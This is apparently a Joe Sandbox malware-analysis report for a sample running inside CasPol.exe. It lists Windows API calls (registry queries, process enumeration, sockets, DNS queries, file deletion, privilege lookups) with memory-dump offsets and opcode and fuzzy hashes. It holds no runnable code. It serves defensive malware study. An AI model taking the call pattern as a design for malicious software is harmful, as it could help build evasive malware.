Function 23D61080 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61111

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 75ece5e9a66ca8cfb4d6ab9990d10a78b557d464094ff98c9ce7fd25a32754c8
Instruction ID: a1baa5ffd58e782e6357e6a8d7a6a3e525b77783a4603f6ae72b065a5ab1b75c
Opcode Fuzzy Hash: 75ece5e9a66ca8cfb4d6ab9990d10a78b557d464094ff98c9ce7fd25a32754c8
Instruction Fuzzy Hash: A321A176409380AFD722CF21DC44F56BFB8EF06714F0884DBE9848B153C265A919CB76

Function 23D60FB0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61045

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 50b9d3048eb966403286d5114a914368761f863e19b3dbd5492890f2eba849f4
Instruction ID: 59a01233ae467f2058fd6610fc4efcd2fe6877e40b6c3fbb085d2df409ba03bc
Opcode Fuzzy Hash: 50b9d3048eb966403286d5114a914368761f863e19b3dbd5492890f2eba849f4
Instruction Fuzzy Hash: F42107B54087C06FE7128B25DC44BA2BFACEF46724F0881DAE8C58B153D264A909C776

Function 23D60516 Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000EA8), ref: 23D605AA

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f6b2736b6cea3a2db21bf2cf6c5b0e9ff8062b66cc2512312f13536ef5289216
Instruction ID: 53c5721d0a55e4a0f18a60235f0a296acff017f454c18c8c8ce3a32cab192430
Opcode Fuzzy Hash: f6b2736b6cea3a2db21bf2cf6c5b0e9ff8062b66cc2512312f13536ef5289216
Instruction Fuzzy Hash: 9F21B075100204AFEB219F11DC40FBAF7ACEF04714F44895AFA859A291D7B5A548CFA2

Function 2180AADA Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA8), ref: 2180AB59

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d7a8936efa4fd3d68ebba3c662598354ef3156b30d712171195940971cd1cba7
Instruction ID: 937f521ddc0a2311b75edfaa460972026c14a0b6157b1ea96833ead504fbf206
Opcode Fuzzy Hash: d7a8936efa4fd3d68ebba3c662598354ef3156b30d712171195940971cd1cba7
Instruction Fuzzy Hash: DE21D176500608AEE7219F11CC84F6BFBECEF04314F04885AE984DB252D774E548CBB2

Function 23D60276 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 23D602E9

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: fb9b7ea377bb8a714a8dad74cf50c51c4ff2ba71d30883c05a712f57275f18f1
Instruction ID: 3e9c2a973585e3fdb027ca1c7d0c7f6b8027c0365cb968aa59abc304e4970081
Opcode Fuzzy Hash: fb9b7ea377bb8a714a8dad74cf50c51c4ff2ba71d30883c05a712f57275f18f1
Instruction Fuzzy Hash: 8621D075504200AFE710DF25DD85F66FBE8EF08624F4884AEE984CB242D775E504CB66

Function 23D60DE3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D60E5F

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 1144e427c5a65dd689a2983281bf09e6c133f4f431174bec49e2502e570fbf2f
Instruction ID: 68e73f18a5802322df636782fb61c98047d1fe725808e7d8207004684d4d0482
Opcode Fuzzy Hash: 1144e427c5a65dd689a2983281bf09e6c133f4f431174bec49e2502e570fbf2f
Instruction Fuzzy Hash: 342192765093809FD711CF25DD54B56BFE8EF06610F0984EAE985CF263E264E908CB61

Function 23D61533 Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,00000EA8), ref: 23D615BF

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: b8ff7c621400b46ea29474b20b8e86440b4104e34f13d13383704ada0bcb8b42
Instruction ID: e36297060f60e9d0818aaaee68933ff229b6e0d61117b4cc25814dfac5957db9
Opcode Fuzzy Hash: b8ff7c621400b46ea29474b20b8e86440b4104e34f13d13383704ada0bcb8b42
Instruction Fuzzy Hash: E721D8755043806FE721CB15DC45FA6FFA8DF05720F0880DEF9858B292D364A948CB66

Function 2180ABE2 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 2180AC5C

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1f1ab273aacc0fb9e64371b6882348ad5195d82a716f7c436c75db0fc0e684f9
Instruction ID: 2f456b97f4f205da77cb9dacced4addbe491aaf8e998d689b8ffcf15def2dcfb
Opcode Fuzzy Hash: 1f1ab273aacc0fb9e64371b6882348ad5195d82a716f7c436c75db0fc0e684f9
Instruction Fuzzy Hash: 3F21C07A200608AFE721CF11CC84FA6B7ECEF04710F04845AE945CB251D774E944CBB6

Function 23D608C2 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D6092C

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 2abe095b88ae316d5c04d9b415dc2b427aa7fde61e5ca25f7a1c78b0377421e7
Instruction ID: a4098917772c8fd89a972bf15c07637d1289288e64b2c404a725db6ff21ce4cc
Opcode Fuzzy Hash: 2abe095b88ae316d5c04d9b415dc2b427aa7fde61e5ca25f7a1c78b0377421e7
Instruction Fuzzy Hash: 7F11DFB6500244AFEB21DF21DC44FABB7ACEF04324F4884AAE985CB251D774A544CBB6

Function 23D618E6 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000EA8,?,?), ref: 23D61972

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 2e8259ab11c71c8bfbc9bcf932fb33574cca5a57880fe123e482f6fbf3eb7cc8
Instruction ID: dae832374ef3a8a7364bc62d08f0b02800c9233817fc7171a1a87960ab2009f3
Opcode Fuzzy Hash: 2e8259ab11c71c8bfbc9bcf932fb33574cca5a57880fe123e482f6fbf3eb7cc8
Instruction Fuzzy Hash: 2D2127755093806FC3128B26CC51F32BFB8EF87620F0981CAE9845B653D225B915C7B2

Function 23D620FA Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 23D6216E

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 28abb79afcd2f8aefe2c0fc9173d204ddd60b1ef8fba0ee913914b6cd3abae28
Instruction ID: e3e6ae8e6ac0f07a0402f2af9f89dbc11f9b71ef6dcf06f67899839ccfaa1037
Opcode Fuzzy Hash: 28abb79afcd2f8aefe2c0fc9173d204ddd60b1ef8fba0ee913914b6cd3abae28
Instruction Fuzzy Hash: DD21F371504204AFE721DF15DC84F66FBE8EF08324F04849DEA848B251D379F548CBA2

Function 23D61C0A Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 23D61C76

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 38c0a6152c70825a4e69d45851468c1f6567026d257d0301c9034e7b64c16471
Instruction ID: 31d1a3b1dadc15c6b679bb9a9f95844560f5ebe650cfe2c452c54c22025ac5af
Opcode Fuzzy Hash: 38c0a6152c70825a4e69d45851468c1f6567026d257d0301c9034e7b64c16471
Instruction Fuzzy Hash: 5321D475500200AFE721DF51DD45F6AFBE8EF04324F04889EE9858B251C375B415CB62

Function 23D6302D Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6309E

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: e10354bea80e363122737d1d7d9d03f0e0513a620fd3e01137118853c25bfdc6
Instruction ID: f1c519a1c07094afc272e684da654904d0052c6a636a0b6a869797f5aba4eef0
Opcode Fuzzy Hash: e10354bea80e363122737d1d7d9d03f0e0513a620fd3e01137118853c25bfdc6
Instruction Fuzzy Hash: AC2192725093809FD712CF25DC44B96BFE8EF06220F0984EBE995CF163D225E908CB62

Function 23D60636 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D606A8

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 31bea1be839dc2d490707a52651607cea4c7c38f979c188923e8e89878a224fe
Instruction ID: 94b129c90a66e9577fcf44a2fc4153c6f0da2b3c5e535ac1d229c76865d71548
Opcode Fuzzy Hash: 31bea1be839dc2d490707a52651607cea4c7c38f979c188923e8e89878a224fe
Instruction Fuzzy Hash: 0311EE76100204AFE720DF51DC44FA6F7ECEF44624F48849AEA859B292D764E448CFB6

Function 23D62D40 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 23D62DAA

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: f3f7ce3539ddd459eb6c8d5c5824d57ac0455e3dea4ef2efdedd7c8279c082f1
Instruction ID: 28922add3f8d98a7dfd041af05d152cbf35bdfa2544a0e53d8ea7b71db3eab5a
Opcode Fuzzy Hash: f3f7ce3539ddd459eb6c8d5c5824d57ac0455e3dea4ef2efdedd7c8279c082f1
Instruction Fuzzy Hash: 2F113D766053809FD711CF25DC85B96BFE8EF06620F0884AEE985DB253D265E848CB61

Function 2180A3D5 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FindWindowW.USER32(?,?), ref: 2180A44B

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: b792dbfa7d0a5eacc1ad9cf8c3c09affe8c893c8df3b2686d991448066feed04
Instruction ID: 1d31dc6cda0951c2837902aa4e93b405c4a724e6225c2c345692f24f85a42038
Opcode Fuzzy Hash: b792dbfa7d0a5eacc1ad9cf8c3c09affe8c893c8df3b2686d991448066feed04
Instruction Fuzzy Hash: E511A2755487849FD7128F25DC89B52BFB8EF07314F0980DAE9848F263D225E849CB62

Function 23D60007 Relevance: 1.6, APIs: 1, Instructions: 62fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6006C

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 81dbb0593a3a8eb59adaf4886f0cc9eec20f120ea0139dbdf2d4737b43a1b7bb
Instruction ID: 274a405261b9aa0b519527b74e89601c6ffb5ecd0eb11e4e9710c58436570d76
Opcode Fuzzy Hash: 81dbb0593a3a8eb59adaf4886f0cc9eec20f120ea0139dbdf2d4737b43a1b7bb
Instruction Fuzzy Hash: F62190725093809FD712CB25DC45B46BFA8EF42220F0984DAD885CF263C229E408CB62

Function 2180A5C7 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2180A632

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3383bd10eb4425bdecaf316dc6ba81af4d877b90ca3c7ed4bed876305a888687
Instruction ID: fb994b9e0ebb704025fa528eaafa21468095017bc88e6b3c27c12ca7780f1195
Opcode Fuzzy Hash: 3383bd10eb4425bdecaf316dc6ba81af4d877b90ca3c7ed4bed876305a888687
Instruction Fuzzy Hash: 98118472409780AFDB228F51DD44B52FFF4EF4A310F0885DAED858B163C275A518DB62

Function 23D610B2 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61111

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bd05550339ee5a2eb1809fe05111e9971fcca6dec199439e4bd2b13324c19ac9
Instruction ID: dc2766a0df21d54710c4792c2704dca6dba6554a9ac979ff9a908fc3dbe29a07
Opcode Fuzzy Hash: bd05550339ee5a2eb1809fe05111e9971fcca6dec199439e4bd2b13324c19ac9
Instruction Fuzzy Hash: A1112775500300AFEB21DF11DC44F66FBA8EF04724F08C49AE9848B241C378A448CFB6

Function 23D61556 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,00000EA8), ref: 23D615BF

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3415f41ce66f5b7b880bfc3d656f83cc06e11ead47d9d900370e51bf7ab81c16
Instruction ID: c51b8398af9396a5f5a29c9405333d938ca050dbf89dc798a30a3823310c9362
Opcode Fuzzy Hash: 3415f41ce66f5b7b880bfc3d656f83cc06e11ead47d9d900370e51bf7ab81c16
Instruction Fuzzy Hash: 18110675600200AFE7209B15EC45FB6FBACDF04724F0880AAFD458A381D7A4B544CF66

Function 23D6042A Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000EA8), ref: 23D6049F

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0431aab5d9f2d53df62d7d5a737fb479603ed61cb154e9ea61603eb07b9e7d63
Instruction ID: a7f438787cb6a7ce5cdbedaafe1a72a4d910fc32d161024d38e863e642986095
Opcode Fuzzy Hash: 0431aab5d9f2d53df62d7d5a737fb479603ed61cb154e9ea61603eb07b9e7d63
Instruction Fuzzy Hash: 6411EF35100200AFEB319F21DC85F66FBA8EF04724F08849AFE845A691D3B5B548CBA6

Function 2180BBF7 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 2180BC61

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 453bbe248a47b2920cf2a5c90337b6a2c2ce185cf115c4a8283583c7f882bc5b
Instruction ID: 35c8150dedf14221750e7573e600856e2393042069da381b911860e9c53ce052
Opcode Fuzzy Hash: 453bbe248a47b2920cf2a5c90337b6a2c2ce185cf115c4a8283583c7f882bc5b
Instruction Fuzzy Hash: DD11D376509380AFD7228F21DC85B52FFB4EF06320F0884DEED858B163D265A458DB62

Function 2180B876 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 2180B8E9

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c8c446e59bbc07300b99aa30774813e06b6bcbe69bd9a85d49f0d2333e5a7d0f
Instruction ID: 3fc61983b039ab19b6958c8f0e5a455772ab26920a5c89e05cb953070d6f7dd9
Opcode Fuzzy Hash: c8c446e59bbc07300b99aa30774813e06b6bcbe69bd9a85d49f0d2333e5a7d0f
Instruction Fuzzy Hash: 6711AF764097C4AFDB228B21DC54A52BFB0EF07320F0D84CAEDC44F263D265A958DB62

Function 2180BEAD Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 2180BF18

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 19a5fb1abc80a618be7c76c8f10e641d07b0d704e726284f0eb18b4a59001313
Instruction ID: 909ea450b8b3acb86e8fbc277ab7d431d84cc440be9ca8c8d8145df4a91971d4
Opcode Fuzzy Hash: 19a5fb1abc80a618be7c76c8f10e641d07b0d704e726284f0eb18b4a59001313
Instruction Fuzzy Hash: 90118E754093C4AFD7138B25DC84B62BFB4EF47624F0980DEED858F263D2656908CB62

Function 2180B7C6 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 2180B832

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 178b3cb132313b191c32da2e5243f98c2b815990e8dee3d3451055cde651cf77
Instruction ID: 69895bb5f5f0faa12ba5e32efe439251d1d1e05e3816c550af6bc1892f3dc290
Opcode Fuzzy Hash: 178b3cb132313b191c32da2e5243f98c2b815990e8dee3d3451055cde651cf77
Instruction Fuzzy Hash: A311A236404384AFCB22CF51DC84A56FFB4EF0A320F08849EE9858B562D375A418DB61

Function 2180A803 Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 2180A864

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 620f7d72438934b28306f24886735639e8992253be1adb58de13a03372663b27
Instruction ID: 521f732aaadfc6fe2a097b2ae0488c17b254470bb3edcc1ba74d3d75b430599d
Opcode Fuzzy Hash: 620f7d72438934b28306f24886735639e8992253be1adb58de13a03372663b27
Instruction Fuzzy Hash: FF119D71409384AFD7128F11DC88B56BFB4EF06324F0884DAED849F293D279A509CB62

Function 23D62D62 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 23D62DAA

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d5bb2c74fbf5acc1885c5c298b583d5ea692af0e5c078e3df9d01a55526c6ecf
Instruction ID: b1e46150ccb152b44482f914a90ebac4d8304aeb7de2fd806e8cf6b6d2ab8021
Opcode Fuzzy Hash: d5bb2c74fbf5acc1885c5c298b583d5ea692af0e5c078e3df9d01a55526c6ecf
Instruction Fuzzy Hash: 0B113C756002019FDB50DF25EC85B56BBE8EF04620F08C4AAED99DB242D675E444CFA2

Function 23D60FF2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61045

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: bb16b79c91a6552ffe23792d0fb6fc2994114421c4a9cb616260f0c7e14d0ee9
Instruction ID: acc4e5d02a64701c344ab834d23e4370518e6faef4fdff8d275392801b10ec43
Opcode Fuzzy Hash: bb16b79c91a6552ffe23792d0fb6fc2994114421c4a9cb616260f0c7e14d0ee9
Instruction Fuzzy Hash: 3001D675500644AFEB20DB12DC44FA6F79CDF04724F48C09AED849B242D368A554CBB6

Function 23D60E1A Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D60E5F

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: acd05a7727a49a66ab1898dc3bc0a3922f80dc2c57e0f67944407cd63c183a5a
Instruction ID: 6810a0c072b7d5cd5c4428a3c9017a7fb407caf2cd9c58ebba4e7398921e0228
Opcode Fuzzy Hash: acd05a7727a49a66ab1898dc3bc0a3922f80dc2c57e0f67944407cd63c183a5a
Instruction Fuzzy Hash: 06118E75A042009FDB50DF25E984B5ABBD8EF04620F88C4AAED48CB242D274E544CF61

Function 23D6305E Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6309E

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 7e18c6d0dc1b8e7f650a79b8db01befcd10ef7ee69248bc68743f9d37e961c5a
Instruction ID: 2e3139e342da889208d160a9a7566e0675d36e5e8ed3bfd6be0aca002670ad33
Opcode Fuzzy Hash: 7e18c6d0dc1b8e7f650a79b8db01befcd10ef7ee69248bc68743f9d37e961c5a
Instruction Fuzzy Hash: 641161756006049FDB10CF66E984B56FBE8EF04620F08C4AEED99CB262D775E458CF62

Function 2180A974 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 2180A9CE

Memory Dump Source

Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 202b74ed72a629db234e701338dbb7fdf79682f6827f2cb0bb4fe5dc411ff1b0
Instruction ID: 596c0980b3ac51297f5b4934acba286667be55a22d1e6d6aee56b61a1c0509f2
Opcode Fuzzy Hash: 202b74ed72a629db234e701338dbb7fdf79682f6827f2cb0bb4fe5dc411ff1b0
Instruction Fuzzy Hash: C811C236508384AFC7228F15DC88B52FFB4EF06320F09C0DAED854B263C275A448CB62

Function 23D611DA Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000EA8,?,?), ref: 23D6122A

Memory Dump Source

Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 562e2755cc38e3e891eea3d967d08b98fee91bf467abba277eda7fc5dd0a81a9
Instruction ID: a16b89e92f6aaaf2cd56a2d67d1a3c5687f3dffb28a68513d4e97a2fa0b8e951
Opcode Fuzzy Hash: 562e2755cc38e3e891eea3d967d08b98fee91bf467abba277eda7fc5dd0a81a9
